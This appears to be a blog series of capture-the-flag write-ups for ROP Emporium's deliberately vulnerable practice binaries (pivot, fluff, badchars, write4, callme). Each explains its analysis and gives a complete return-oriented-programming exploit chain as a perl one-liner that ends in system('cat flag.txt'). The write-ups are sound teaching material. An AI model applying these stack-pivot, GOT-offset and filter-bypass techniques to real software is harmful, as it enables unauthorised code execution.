KLamp Works

ROP Emporium CTF 7/7 pivot

Fri, 05 Jul 2019 19:36:20 +0000

This challenge uses a different pwnme function to other ROP Emporium challenges. First main() will malloc a 0x1000000 byte buffer and then send the address to pwnme().

$ r2 ./pivot -qc "aa ; pdf @sym.main"
/ (fcn) main 165
|   int main (int argc, char **argv, char **envp);
...
|           0x004009ee      mov edi, 0x1000000
|           0x004009f3      call sym.imp.malloc
...
|           0x00400a0e      mov rdi, rax
|           0x00400a11      call sym.pwnme

Then pwnme(), reads 0x100 bytes into the malloced buffer and 0x40 into a stack buffer.

$ r2 ./pivot -qc "aa ; pdf @sym.pwnme"
/ (fcn) sym.pwnme 167
|   sym.pwnme (int32_t arg1);
...
|           0x00400a3f      sub rsp, 0x30
|           0x00400a43      mov qword [rbp-0x28], rdi
|           0x00400a47      lea rax, [rbp-0x20]
...
|           0x00400a96      mov rdx, qword [obj.stdin]
|
|           0x00400a9d      mov rax, qword [rbp-0x28]
|           0x00400aa1      mov esi, 0x100
|           0x00400aa6      mov rdi, rax
|           0x00400aa9      call sym.imp.fgets
...
|           0x00400ac7      mov rdx, qword [obj.stdin]
|           0x00400ace      lea rax, [rbp-0x20]
|           0x00400ad2      mov esi, 0x40
|           0x00400ad7      mov rdi, rax
|           0x00400ada      call sym.imp.fgets

The offsets for the stack buffer overflow are the same as previous challenges.

$ perl -e 'print("\n" . ("\x00" x 0x28) . "fedcba")' |
  gdb ./pivot --batch -ex run
pivot by ROP Emporium
64bits

Call ret2win() from libpivot.so
The Old Gods kindly bestow upon you a place to pivot: 0x7ffff7bf1f10
Send your second chain now and it will land there
> Now kindly send your stack smash
>
Program received signal SIGSEGV, Segmentation fault.
0x0000616263646566 in ?? ()

As stated in the output, the goal this time is to call ret2win() from libpivot.so so there is no usefulFunction() this time but there is usefulGadgets.

$ r2 ./pivot -qc "is" | grep useful
076 0x00000b00 0x00400b00 GLOBAL NOTYPE    0 usefulGadgets

$ r2 ./pivot -qc "pd 8 @ 0x00400b00"
            ;-- usefulGadgets:
            0x00400b00      58             pop rax
            0x00400b01      c3             ret
            0x00400b02      4894           xchg rax, rsp
            0x00400b04      c3             ret
            0x00400b05      488b00         mov rax, qword [rax]
            0x00400b08      c3             ret
            0x00400b09      4801e8         add rax, rbp
            0x00400b0c      c3             ret

After the overflow we only have 24 bytes of payload left (3 words). So the first thing we need to do is put the rest of the exploit in the malloced buffer and modify the stack pointer to point there. This is called a stack pivot.

In usefulGadgets, the xchg rax, rsp one is exactly what we need but we also need the address of the malloced buffer in rax first.

Reading pwnme() again shows that the buffer address (in rdi) is copied to a local variable on the stack

|           0x00400a43      mov qword [rbp-0x28], rdi

and when we smash the stack, rax contains the address of another stack variable

|           0x00400ace      lea rax, [rbp-0x20]

So the pop rax gadget is a red herring, all we need to do is add -8 to what is already in rax to get the address of the local variable pointing to the malloc buffer.

The add rax, rbp is a clue, because before the overflow overwrites the return address on the stack, it overwrites the stored rbp which is poped into the rbp register on ret.

+----------------------------------+
|              Stack               |
+----------------------------------+
| saved rip                        |
+----------------------------------+
| saved rbp             (rbp)      |
+----------------------------------+
|               ...                |
|               ...                |
|               ...                |
| stack buffer          (rbp-0x20) |
+----------------------------------+
| malloc buffer pointer (rbp-0x28) |
+----------------------------------+

The first stage rop chain just to do the stack pivot looks like this:

"\n"               # skip the `malloc` buffer input for now
"\x00" x 0x20      # junk
0xfffffffffffffff8 # -8 => rbp
0x0000000000400b09 # add rax, rbp
0x0000000000400b05 # mov rax, qword [rax]
0x0000000000400b02 # xchg rax, rsp

$ perl -e 'print("\n" .
                ("\x00" x 0x20) .
                 "\xf8\xff\xff\xff\xff\xff\xff\xff" .
                 "\x09\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x05\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x02\x0b\x40\x00\x00\x00\x00\x00")' |
  gdb ./pivot --batch -ex run -ex "info registers" |
  grep -e bestow -e rsp
The Old Gods kindly bestow upon you a place to pivot: 0x7ffff7bf1f10
rsp            0x7ffff7bf1f18   0x7ffff7bf1f18

The reason the GDB output is 8 bytes off is because the CPU has poped the first word into rip before segfaulting, therefor incrementing rsp by 8.

Unfortunately for us the ret2win() function is not imported in the ELF.

$ r2 ./pivot -qc "ii"
[Imports]
Num  Vaddr       Bind      Type Name
   1 0x004007f0  GLOBAL    FUNC free
   2 0x00000000    WEAK  NOTYPE _ITM_deregisterTMCloneTable
   3 0x00400800  GLOBAL    FUNC puts
   4 0x00400810  GLOBAL    FUNC printf
   5 0x00400820  GLOBAL    FUNC memset
   6 0x00400830  GLOBAL    FUNC __libc_start_main
   7 0x00400840  GLOBAL    FUNC fgets
   8 0x00000000    WEAK  NOTYPE __gmon_start__
   9 0x00400850  GLOBAL    FUNC foothold_function
  10 0x00400860  GLOBAL    FUNC malloc
  11 0x00400870  GLOBAL    FUNC setvbuf
  12 0x00000000    WEAK  NOTYPE _Jv_RegisterClasses
  13 0x00400880  GLOBAL    FUNC exit
  14 0x00000000    WEAK  NOTYPE _ITM_registerTMCloneTable

That means no legitimate code in the application calls it. Most people gloss over this part and jump straight to the obvious solution without understanding why it works. But the thing about junk hacking is that getting to a solution is not the point. It’s about learning something.

When an ELF binary is launched by the OS, it is copied from disk into memory. If the ELF file is dynamically linked against shared libraries then the libraries also need to be copied into memory. But the important property of shared libraries is that they can be updated independently of the applications which use them so the address of functions inside the library are not known to the application at compile time.

So when the ELF file is executed, the loader (ld.so) could create a big table with the address of every function in the shared libraries (called BIND_NOW mode). However it is slow and the application probably doesn’t call all them functions every time it executes anyway. So the default behaviour is for the loader to fill that table with links to a function in the loader itself which will figure out where the desired library function is and cache the address so next time the function is called the CPU goes straight to the function instead of ld.so again.

The way this is implemented is with two tables the Procedure Linkage Table (.plt) and Global Offset Table .plt (.got.plt).

The simple way to think of it is .plt is code and .got.plt is just a list of addresses (data). We can see this reflected in the permissions:

$ r2 ./pivot -qc "iS" | grep -e ' .plt$' -e ' .got.plt'
12 0x000007e0   176 0x004007e0   176 -r-x .plt
24 0x00002000   104 0x00602000   104 -rw- .got.plt

So calling a library function from the application actually executes the .plt entry for that function and the .plt code will jmp to a corresponding address in the .got.plt table. In the beginning, that .got.plt address will point somewhere into ld.so. The ld.so code will figure out where the library function actually is and write that address to the .got.plt. So the next time the .plt code jmps to the address in the .got.plt, it will go straight to the library function instead of ld.so again.

When solving this challenge I drew diagrams to help myself understand it:

---------------[ 1st call to foothold_function .plt (0x00400850 ]---------------

+-----------------------+    qword [0x00602048]     +-------------------------+
|   0x00400850 (.plt)   |-------------------------->|  0x00602048 (.got.plt)  |
| imp.foothold_function |<--------------------------| reloc.foothold_function |
| jmp qword [0x602048]  |          0x00400856       |    (qword)0x00400856    |
+-----------------------+                           +-------------------------+
           | jmp
           v
  +-------------------+
  | 0x00400856 (.plt) |
  |        ...        |
  +-------------------+
           | jmp
           v
       +---------+  mov qword ... 0x7fd25eed7970   +-------------------------+
       | (ld.so) |-------------------------------->|  0x00602048 (.got.plt)  |
       |   ...   |                                 | reloc.foothold_function |
       +---------+                                 |      0x7fd25eed7970     |
           | jmp                                   +-------------------------+
           v
+------------------------------+
| 0x7fd25eed7970 (libpivot.so) |
|      foothold_function       |
|             ...              |
+------------------------------+
-------------------------------------[ end ]------------------------------------

--------------[ 1+Nth call to foothold_function .plt (0x00400850 ]--------------

+-----------------------+    qword [0x00602048]     +-------------------------+
|   0x00400850 (.plt)   |-------------------------->|  0x00602048 (.got.plt)  |
| imp.foothold_function |<--------------------------| reloc.foothold_function |
| jmp qword [0x602048]  |        0x7fd25eed7970     |      0x7fd25eed7970     |
+-----------------------+                           +-------------------------+
           | jmp
           v
+------------------------------+
| 0x7fd25eed7970 (libpivot.so) |
|      foothold_function       |
|             ...              |
+------------------------------+
-------------------------------------[ end ]------------------------------------

Now that we understand how shared library functions are called, the obvious solution is to

call the foothold_function to get its address into .got.plt
measure difference between foothold_function address and ret2win address
add difference to foothold_function address from .got.plt
jmp to new address

Here is how we can calculate the offset of the two library functions

$ nm libpivot.so | grep -e foothold_function -e ret2win
0000000000000970 T foothold_function
0000000000000abe T ret2win
$ printf 0x%016x $((0xabe - 0x970))
0x000000000000014e

And this is what our second rop chain looks like

0x0000000000400850 ; foothold_function
0x0000000000400948 ; pop rbp
0x000000000000014e ; 0x14e => rbp
0x0000000000400b00 ; pop rax
0x0000000000602048 ; .got.plt[foothold_function] => rax
0x0000000000400b05 ; mov rax, qword [rax] (dereference pointer)
0x0000000000400b09 ; add rax, rbp
0x00000000004008f5 ; jmp rax

And this is how we can execute it in practice:

$ perl -e 'print("\x50\x08\x40\x00\x00\x00\x00\x00" .
                 "\x48\x09\x40\x00\x00\x00\x00\x00" .
                 "\x4e\x01\x00\x00\x00\x00\x00\x00" .
                 "\x00\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x48\x20\x60\x00\x00\x00\x00\x00" .
                 "\x05\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x09\x0b\x40\x00\x00\x00\x00\x00" .
                 "\xf5\x08\x40\x00\x00\x00\x00\x00" .
                 "\n" .
                 ("\x00" x 0x20) .
                 "\xf8\xff\xff\xff\xff\xff\xff\xff" .
                 "\x09\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x05\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x02\x0b\x40\x00\x00\x00\x00\x00")' |
  LD_LIBRARY_PATH=. ./pivot
pivot by ROP Emporium
64bits

Call ret2win() from libpivot.so
The Old Gods kindly bestow upon you a place to pivot: 0x7f09d6dd3f10
Send your second chain now and it will land there
> Now kindly send your stack smash
> foothold_function(), check out my .got.plt entry to gain a foothold into libpivot.soROPE{a_placeholder_32byte_flag!}

(The flag is all the way to the right because there is no newline printed before)

ROP Emporium CTF 6/7 fluff

Fri, 07 Jun 2019 19:36:20 +0000

This challenge uses a similar pwnme function to other ROP Emporium challenges.

$ perl -e 'print(("\x00" x 0x28) . "fedcba")' |
  gdb ./fluff --batch -ex run
fluff by ROP Emporium
64bits

You know changing these strings means I have to rewrite my solutions...
>
Program received signal SIGSEGV, Segmentation fault.
0x0000616263646566 in ?? ()

Looking at the symbols we don’t have usefulGadgets this time.

$ r2 ./fluff -qc "is" | grep useful
039 0x00000807 0x00400807  LOCAL   FUNC   17 usefulFunction

$ r2 ./fluff -qc "aa ; pdf @sym.usefulFunction"
/ (fcn) sym.usefulFunction 17
|   sym.usefulFunction ();
|           0x00400807      55             push rbp
|           0x00400808      4889e5         mov rbp, rsp
|           0x0040080b      bf5b094000     mov edi, str.bin_ls
|           0x00400810      e8cbfdffff     call sym.imp.system
|           0x00400815      90             nop
|           0x00400816      5d             pop rbp
\           0x00400817      c3             ret

But there are some questionableGadgets which appear to be useful gadgets mixed with less useful instructions.

$ r2 ./fluff -qc "is" | grep -i gadget
067 0x00000820 0x00400820 GLOBAL NOTYPE    0 questionableGadgets

$ r2 ./fluff -qc "pd 21 @ 0x00400820"
            ;-- questionableGadgets:
            0x00400820      pop r15
            0x00400822      xor r11, r11
            0x00400825      pop r14
            0x00400827      mov edi, loc.data_start     ; loc.__data_start
                                                        ; 0x601050
            0x0040082c      ret
            0x0040082d      pop r14
            0x0040082f      xor r11, r12
            0x00400832      pop r12
            0x00400834      mov r13d, 0x604060          ; '`@`'
            0x0040083a      ret
            0x0040083b      mov edi, loc.data_start     ; loc.__data_start
                                                        ; 0x601050
            0x00400840      xchg r11, r10
            0x00400843      pop r15
            0x00400845      mov r11d, 0x602050          ; 'P `'
            0x0040084b      ret
            0x0040084c      pop r15
            0x0040084e      mov qword [r10], r11
            0x00400851      pop r13
            0x00400853      pop r12
            0x00400855      xor byte [r10], r12b
            0x00400858      ret

Building a working exploit from these pieces is a little convoluted.

Working backwards, our last 2 gadgets need to be:

mov edi, 0x601050
system()

Next we need to get our exploit string into 0x601050. There are 2 gadgets for writing registers to memory:

mov qword [r10], r11
xor byte [r10], r12b

We’ll go for the mov because it is moving 8 bytes at once whereas the xor gadget is only copying a single byte. To make it work we need [1] 0x601050 in r10 and [2] our exploit string in r11.

For [1] there are no gadgets to mov 0x601050 into a general purpose register but we can copy a close number (0x602050) and then xor by 0x3000 to turn the 0x2050 part into 0x1050.

mov r11d, 0x602050
pop r12 ...
0x3000
xor r11, r12
xchg r11, r10

For [2] we first need to come up with an exploit string. Keeping it under 8 bytes will save us from duplicating parts of the rop chain. So instead of "/bin/cat flag.txt" we can abuse shell globbing and knowledge that only two files exist in the bin/ directory, "fluff" and "flag.txt" (run the exploit with ls first if you think that “knowing” the directory layout is too close to cheating). With that in mind we can exploit shell globbing to capture only the flag file with less than 8 bytes "cat *t".

pop r12 ...
0x0000742a20746163 ("cat *t")
xor r11, r11 (0x00 => r11)
xor r11, r12 (r12 => r11)

Now finally we can do the mov qword to get our exploit string into the right memory address.

mov qword [r10], r11

Interleaving the various gadgets so they don’t clobber each other is another mini challenge. The final rop chain I came up with looks like this:

0x0000000000400845 # mov r11d, 0x602050
0x0000000000400832 # pop r12 ; mov r13d, 0x604060
0x0000000000003000 #
0x000000000040082f # xor r11, r12 ; pop r12 ; mov r13d, 0x604060
0x0000742a20746163 # "cat *t" => r12
0x0000000000400840 # xchg r11, r10 ; pop r15 ; mov r11d, 0x602050
0x0000000000000000 # => r15
0x0000000000400822 # xor r11, r11 ; pop r14 ; mov edi, 0x601050
0x0000000000000000 # => r14
0x000000000040082f # xor r11, r12 ; pop r12 ; mov r13d, 0x604060
0x0000000000000000 # => r12
0x000000000040084e # mov qword [r10], r11 ; pop r13 ; pop r12 ; xor byte [r10], r12b
0x0000000000000000 # => r13
0x0000000000000000 # => r12
0x0000000000400810 # => system()

See the earlier split challenge for code to convert addresses to the form below.

perl -e 'print(("\x00" x 0x28) .
               "\x45\x08\x40\x00\x00\x00\x00\x00" .
               "\x32\x08\x40\x00\x00\x00\x00\x00" .
               "\x00\x30\x00\x00\x00\x00\x00\x00" .
               "\x2f\x08\x40\x00\x00\x00\x00\x00" .
               "\x63\x61\x74\x20\x2a\x74\x00\x00" .
               "\x40\x08\x40\x00\x00\x00\x00\x00" .
               "\x00\x00\x00\x00\x00\x00\x00\x00" .
               "\x22\x08\x40\x00\x00\x00\x00\x00" .
               "\x00\x00\x00\x00\x00\x00\x00\x00" .
               "\x2f\x08\x40\x00\x00\x00\x00\x00" .
               "\x00\x00\x00\x00\x00\x00\x00\x00" .
               "\x4e\x08\x40\x00\x00\x00\x00\x00" .
               "\x00\x00\x00\x00\x00\x00\x00\x00" .
               "\x00\x00\x00\x00\x00\x00\x00\x00" .
               "\x10\x08\x40\x00\x00\x00\x00\x00")' | ./fluff
fluff by ROP Emporium
64bits

You know changing these strings means I have to rewrite my solutions...
> ROPE{a_placeholder_32byte_flag!}
Segmentation fault

ROP Emporium CTF 5/7 badchars

Fri, 03 May 2019 19:36:20 +0000

This challenge has a different pwnme function to the previous ones. The stack buffer overflow part is similar (0x200 bytes).

 $ perl -e 'print(("\x00" x 0x28) . "aaaaa")' |
   gdb ./badchars --batch -ex run
 badchars by ROP Emporium
 64bits
 
 badchars are: b i c / <space> f n s
 >
 Program received signal SIGSEGV, Segmentation fault.
 0x0000006161616161 in ?? ()

However the initial fgets stores the input in a correctly sized heap buffer and filters certain characters with checkBadchars(). Only after that the data is memcpyed to the small stack buffer and causing an overflow.

As with all Rop Emporium challenges, we can get a leg up by searching for “useful” symbols.

$ r2 ./badchars -qc "is" | grep useful
041 0x000009df 0x004009df  LOCAL   FUNC   17 usefulFunction
079 0x00000b30 0x00400b30 GLOBAL NOTYPE    0 usefulGadgets

The usefulFunction() merely contains a call to system().

$ r2 ./badchars -qc "aaa; pdf @ sym.usefulFunction"
/ (fcn) sym.usefulFunction 17
|   sym.usefulFunction ();
|           0x004009df      push rbp
|           0x004009e0      mov rbp, rsp
|           0x004009e3      mov edi, str.bin_ls
|           0x004009e8      call sym.imp.system
|           0x004009ed      nop
|           0x004009ee      pop rbp
\           0x004009ef      ret

$ r2 ./badchars -qc "pd 12 @ 0x00400b30"
            ;-- usefulGadgets:
            0x00400b30      xor byte [r15], r14b
            0x00400b33      ret
            0x00400b34      mov qword [r13], r12
            0x00400b38      ret
            0x00400b39      pop rdi
            0x00400b3a      ret
            0x00400b3b      pop r12
            0x00400b3d      pop r13
            0x00400b3f      ret
            0x00400b40      pop r14
            0x00400b42      pop r15
            0x00400b44      ret

So similar to previous challenges, we need to smuggle our shell command into a writable region of memory (start of .bss is good), load that address into rdi register and then jmp to the call to system(). The twist this time is that we need to encode the “bad” characters in the exploit string somehow so they don’t get filtered and then decode them once they are written to the .bss buffer. We can use the xor gadget for that.

The first part of our exploit, to smuggle the shell command into writable memory looks like this.

0x00000000400b3b  # pop r12, pop r13
0x616c6620746163  # "cat fla" (src)
0x00000000601080  # .bss      (dst)
0x00000000400b34  # mov qword [r13], r12
0x00000000400b3b  # pop r12, pop r13
0x00007478742e67  # "g.txt" (src)
0x00000000601087  # .bss +7 (dst)
0x00000000400b34  # mov qword [r13], r12

$ perl -e 'print(("\x00" x 0x28) .
                 "\x3b\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x63\x61\x74\x20\x66\x6c\x61\x00" .
                 "\x80\x10\x60\x00\x00\x00\x00\x00" .
                 "\x34\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x3b\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x67\x2e\x74\x78\x74\x00\x00\x00" .
                 "\x87\x10\x60\x00\x00\x00\x00\x00" .
                 "\x34\x0b\x40\x00\x00\x00\x00\x00")' |
  gdb ./badchars --batch -ex run -ex "x/s 0x00000000601080"
badchars by ROP Emporium
64bits

badchars are: b i c / <space> f n s
>
Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
0x601080 <stdout@@GLIBC_2.2.5>: "\353at\353\353lag.txt"

Examining the destination buffer as a string with GDB shows some of the characters have been filtered as expected.

Since all ASCII values are between 0x0-0x7f, an easy way to encode them is to set the highest bit (0x80) on input and then take it away with xor. The filtered letters are 'c' (0x63), ' ' (0x20) and 'f' (0x66).

printf %02x $((0x63 | 0x80)) => 0xe3
printf %02x $((0x20 | 0x80)) => 0xa0
printf %02x $((0x66 | 0x80)) => 0xe6

0x616c6620746163  # "cat fla"
0x00007478742e67  # "g.txt"

becomes

0x616ce6a07461e3
0x00007478742e67

And to decode the 3 “bad” characters we add

0x00000000400b40  # pop r14, pop r15
0x00000000000080  # xor character
0x00000000601080  # .bss + 0 ('c')
0x00000000400b30  # xor byte [r15], r14b

0x00000000400b42  # pop r15
0x00000000601083  # .bss + 3 (' ')
0x00000000400b30  # xor byte [r15], r14b

0x00000000400b42  # pop r15
0x00000000601084  # .bss + 4 ('f')
0x00000000400b30  # xor byte [r15], r14b

$ perl -e 'print(("\x00" x 0x28) .
                 "\x3b\x0b\x40\x00\x00\x00\x00\x00" .
                 "\xe3\x61\x74\xa0\xe6\x6c\x61\x00" .
                 "\x80\x10\x60\x00\x00\x00\x00\x00" .
                 "\x34\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x3b\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x67\x2e\x74\x78\x74\x00\x00\x00" .
                 "\x87\x10\x60\x00\x00\x00\x00\x00" .
                 "\x34\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x40\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x80\x00\x00\x00\x00\x00\x00\x00" .
                 "\x80\x10\x60\x00\x00\x00\x00\x00" .
                 "\x30\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x42\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x83\x10\x60\x00\x00\x00\x00\x00" .
                 "\x30\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x42\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x84\x10\x60\x00\x00\x00\x00\x00" .
                 "\x30\x0b\x40\x00\x00\x00\x00\x00")' |
  gdb ./badchars --batch -ex run -ex "x/s 0x00000000601080"
badchars by ROP Emporium
64bits

badchars are: b i c / <space> f n s
>
Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
0x601080 <stdout@@GLIBC_2.2.5>: "cat flag.txt"

Now we have bypassed the filter and have the shell command in memory we only need to load it into the rdi register (first argument for a function) and jmp to the call to system().

0x00000000400b39  # pop rdi
0x00000000601080  # .bss
0x000000004009e8  # call sym.imp.system

$ perl -e 'print(("\x00" x 0x28) .
                 "\x3b\x0b\x40\x00\x00\x00\x00\x00" .
                 "\xe3\x61\x74\xa0\xe6\x6c\x61\x00" .
                 "\x80\x10\x60\x00\x00\x00\x00\x00" .
                 "\x34\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x3b\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x67\x2e\x74\x78\x74\x00\x00\x00" .
                 "\x87\x10\x60\x00\x00\x00\x00\x00" .
                 "\x34\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x40\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x80\x00\x00\x00\x00\x00\x00\x00" .
                 "\x80\x10\x60\x00\x00\x00\x00\x00" .
                 "\x30\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x42\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x83\x10\x60\x00\x00\x00\x00\x00" .
                 "\x30\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x42\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x84\x10\x60\x00\x00\x00\x00\x00" .
                 "\x30\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x39\x0b\x40\x00\x00\x00\x00\x00" .
                 "\x80\x10\x60\x00\x00\x00\x00\x00" .
                 "\xe8\x09\x40\x00\x00\x00\x00\x00")' | ./badchars
badchars by ROP Emporium
64bits

badchars are: b i c / <space> f n s
> ROPE{a_placeholder_32byte_flag!}
Segmentation fault

ROP Emporium CTF 4/7 write4

Fri, 05 Apr 2019 19:36:20 +0000

This challenge uses a similar pwnme function as the previous split challenge with the same offsets but a larger overflow (0x200 bytes).

$ perl -e 'print(("\x00" x 0x28) . "fedcba")' |
  gdb ./write4 --batch -ex run
write4 by ROP Emporium
...
Program received signal SIGSEGV, Segmentation fault.
0x0000616263646566 in ?? ()

The usefulFunction is back but no usefulString this time.

$ r2 ./write4 -qc "is"
...
039 0x00000807 0x00400807  LOCAL   FUNC   17 usefulFunction
...
074 0x00000820 0x00400820 GLOBAL NOTYPE    0 usefulGadgets
...

$ r2 ./write4 -qc "aa ; pdf @ sym.usefulFunction"
/ (fcn) sym.usefulFunction 17
|   sym.usefulFunction ();
|           0x00400807      push rbp
|           0x00400808      mov rbp, rsp
|           0x0040080b      mov edi, str.bin_ls
|           0x00400810      call sym.imp.system
|           0x00400815      nop
|           0x00400816      pop rbp
\           0x00400817      ret

Only one usefulGadget and it is copying from register to memory.

$ r2 ./write4 -qc "aa ; pd 2 @ 0x00400820"
          ;-- usefulGadgets:
          0x00400820      mov qword [r14], r15
          0x00400823      ret

Even though the string "cat flag.txt" does not appear in the binary, we can inject it onto the stack as part of the overflow. We can then use the first of usefulGadgets to copy the string to a known memory address and jmp to the system() function.

Here are the gadgets we need from usefulGadgets, to write a register value to memory address.

0x00400820      mov qword [r14], r15

To load an arbitrary value into r15 and memory address into r15.

$ r2 ./write4 -qc ' "/R pop r14;pop r15;ret" '
  0x00400890               415e  pop r14
  0x00400892               415f  pop r15
  0x00400894                 c3  ret

We also need to load the address of our freshly copied string into the rdi register so it can be passed as an argument to system().

$ r2 ./write4 -qc ' "/R pop rdi;ret" '
  0x00400893                 5f  pop rdi
  0x00400894                 c3  ret

Finally we need a destination to copy our string to. The .bss section is ideal because it is guaranteed to be r/w and it is initialized to zero so we don’t need to manually NUL terminate the string (as long as code running before the exploit doesn’t write there). In our case can just use the very start of .bss.

$ r2 ./write4 -qc ' "iS" ' | grep bss
26 0x00001060     0 0x00601060    48 -rw- .bss

So our rop chain will look like this:

0x00000000400890 # pop r14; pop r15
0x00000000601060 # .bss
0x616c6620746163 # "cat fla"
0x00000000400820 # mov qword [r14], r15

0x00000000400890 # pop r14; pop r15
0x00000000601067 # .bss + 7
0x00007478742e67 # "g.txt"
0x00000000400820 # mov qword [r14], r15

0x00000000400893 # pop rdi
0x00000000601060 # .bss
0x00000000400810 # system(rdi)

See the previous split challenge for code to convert addresses to the form below.

$ perl -e 'print(("\x00" x 0x28) .
                 "\x90\x08\x40\x00\x00\x00\x00\x00" .
                 "\x60\x10\x60\x00\x00\x00\x00\x00" .
                 "\x63\x61\x74\x20\x66\x6c\x61\x00" .
                 "\x20\x08\x40\x00\x00\x00\x00\x00" .
                 "\x90\x08\x40\x00\x00\x00\x00\x00" .
                 "\x67\x10\x60\x00\x00\x00\x00\x00" .
                 "\x67\x2e\x74\x78\x74\x00\x00\x00" .
                 "\x20\x08\x40\x00\x00\x00\x00\x00" .
                 "\x93\x08\x40\x00\x00\x00\x00\x00" .
                 "\x60\x10\x60\x00\x00\x00\x00\x00" .
                 "\x10\x08\x40\x00\x00\x00\x00\x00")' |
  ./write4
write4 by ROP Emporium
64bits

Go ahead and give me the string already!
> ROPE{a_placeholder_32byte_flag!}
Segmentation fault

ROP Emporium CTF 3/7 callme

Fri, 01 Mar 2019 19:36:20 +0000

This challenge uses a similar pwnme function to other ROP Emporium challenges.

$ perl -e 'print(("\x00" x 0x28) . "fedcba")' |
  gdb ./callme --batch -ex run
callme by ROP Emporium
...
Program received signal SIGSEGV, Segmentation fault.
0x0000616263646566 in ?? ()

Scanning through the symbols we see a number of interesting functions:

$ r2 ./callme -qc "is"
[Symbols]
Num Paddr      Vaddr      Bind     Type Size Name
...
004 0x00001810 0x00401810 GLOBAL   FUNC   16 imp.callme_three
...
008 0x00001850 0x00401850 GLOBAL   FUNC   16 imp.callme_one
...
011 0x00001870 0x00401870 GLOBAL   FUNC   16 imp.callme_two
...

We can’t disassemble them here because they are imported from a shared library. The intricacies of how functions are imported from shared libraries are explored in the pivot challenge.

We need to do some reverse engineering to understand what these functions do.

callme_one

$ r2 ./libcallme.so -qc "aa ; pdf @ sym.callme_one"
...

Takes three arguments

0x000008f8      897dec         mov dword [local_14h], edi
0x000008fb      8975e8         mov dword [local_18h], esi
0x000008fe      8955e4         mov dword [local_1ch], edx

First argument must equal 1

0x00000901      837dec01       cmp dword [local_14h], 1
0x00000905      0f85b0000000   jne 0x9bb

Second argument must equal 2

0x0000090b      837de802       cmp dword [local_18h], 2    ; [0x2:4]=0x102464c
0x0000090f      0f85a6000000   jne 0x9bb

Third argument must equal 3

0x00000915      837de403       cmp dword [local_1ch], 3    ; [0x3:4]=0x1010246
0x00000919      0f859c000000   jne 0x9bb

Opens the flag file as read only

0x0000091f      48c745f80000.  mov qword [local_8h], 0
0x00000927      488d35820200.  lea rsi, 0x00000bb0 ; "r"
0x0000092e      488d3d7d0200.  lea rdi, str.encrypted_flag.txt
0x00000935      e886feffff     call sym.imp.fopen
0x0000093a      488945f8       mov qword [local_8h], rax

Create a 0x21 buffer with malloc

0x0000095b      bf21000000     mov edi, 0x21
0x00000960      e84bfeffff     call sym.imp.malloc
0x00000965      488905fc0620.  mov qword obj.g_buf, rax

Read 0x21 bytes from file into malloced buffer

0x0000098e      488b05d30620.  mov rax, qword obj.g_buf
0x00000995      488b55f8       mov rdx, qword [local_8h]
0x00000999      be21000000     mov esi, 0x21
0x0000099e      4889c7         mov rdi, rax
0x000009a1      e8fafdffff     call sym.imp.fgets

In summary, callme_one does

check that edi == 1, esi == 2, edx == 3
allocate 0x21 buffer obj.g_buf
read 0x21 bytes from FLAG file
return pointer to buffer (rax)

callme_two

$ r2 ./libcallme.so -qc "aa ; pdf @ sym.callme_two"
...

First three arguments need to be 1, 2 and 3

0x000009dc      897dec         mov dword [local_14h], edi
0x000009df      8975e8         mov dword [local_18h], esi
0x000009e2      8955e4         mov dword [local_1ch], edx
0x000009e5      837dec01       cmp dword [local_14h], 1
0x000009e9      0f85a2000000   jne 0xa91
0x000009ef      837de802       cmp dword [local_18h], 2
0x000009f3      0f8598000000   jne 0xa91
0x000009f9      837de403       cmp dword [local_1ch], 3
0x000009fd      0f858e000000   jne 0xa91

Open file "key1.dat" as readonly

0x00000a0b      488d359e0100.  lea rsi, 0x00000bb0
0x00000a12      488d3d000200.  lea rdi, str.key1.dat ; "r"
0x00000a19      e8a2fdffff     call sym.imp.fopen
0x00000a1e      488945f8       mov qword [local_8h], rax
0x00000a22      48837df800     cmp qword [local_8h], 0
0x00000a27      7516           jne 0xa3f

The local vairable local_ch is a counter and local_8h is the key file descriptor.

The counter is initialized to zero.

0x00000a46      c745f4000000.  mov dword [local_ch], 0

The following code then loops 16 times.

callme_three

$ r2 ./libcallme.so -qc "aa ; pdf @ sym.callme_three"
...

Is similar to callme_two except it opens a file called key2.dat and xors bytes 16-32 of the global buffer. It also prints out the result so we don’t need to setup a call to printf manually.

Write a Decryptor

We can test our understanding of the algorithm so far by writing a custom decryptor.

$ cat << EOF > decrypt.rb
  flag = File.read("encrypted_flag.txt")
  key1 = File.read("key1.dat")
  key2 = File.read("key2.dat")
  
  c = 0
  key1.each_byte do |b|
    flag[c] = (flag[c].ord ^ b).chr
    c += 1
  end
  
  key2.each_byte do |b|
    flag[c] = (flag[c].ord ^ b).chr
    c += 1
  end
  
  puts flag
EOF

$ ruby decrypt.rb
ROPE{a_placeholder_32byte_flag!}!

Exploit

Our ROP chain needs to look like this:

40 bytes padding before the overflow
assign rdi=1, rsi=2, rdx=3
callme_one (0x00401850)
assign rdi=1, rsi=2, rdx=3
callme_two (0x00401870)
assign rdi=1, rsi=2, rdx=3
callme_three (0x00401810)

As luck would have is, a gadget which pops all three registers in a row is available

